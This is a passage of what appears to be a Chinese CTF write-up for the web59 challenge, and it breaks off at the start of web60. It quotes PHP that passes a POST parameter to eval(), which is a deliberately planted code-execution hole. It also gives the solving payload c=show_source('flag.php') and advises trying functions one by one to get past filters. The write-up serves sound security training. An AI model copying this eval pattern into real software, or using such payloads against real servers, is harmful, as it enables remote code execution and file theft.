web59
<?php
/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
// 你们在炫技吗?
if(isset($_POST['c'])){
$c= $_POST['c'];
eval($c);
}else{
highlight_file(__FILE__);
payload:c=show_source('flag.php');
我还是那句话:如果不知道对面过滤了啥,那就一个一个尝试
解释:在 PHP 中,show_source()
是一个内置函数,用于打开并显示指定文件的源代码。该函数接受一个文件名作为参数,并将该文件的内容以文本形式进行输出。
下面是我的文章对命令执行常用语句的总结:来源于:一篇文章带你进阶CTF命令执行-优快云博客
我不想太多,一个个丢进去,看那个可以就是那个
web60
<?php
/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date: 2020-09-05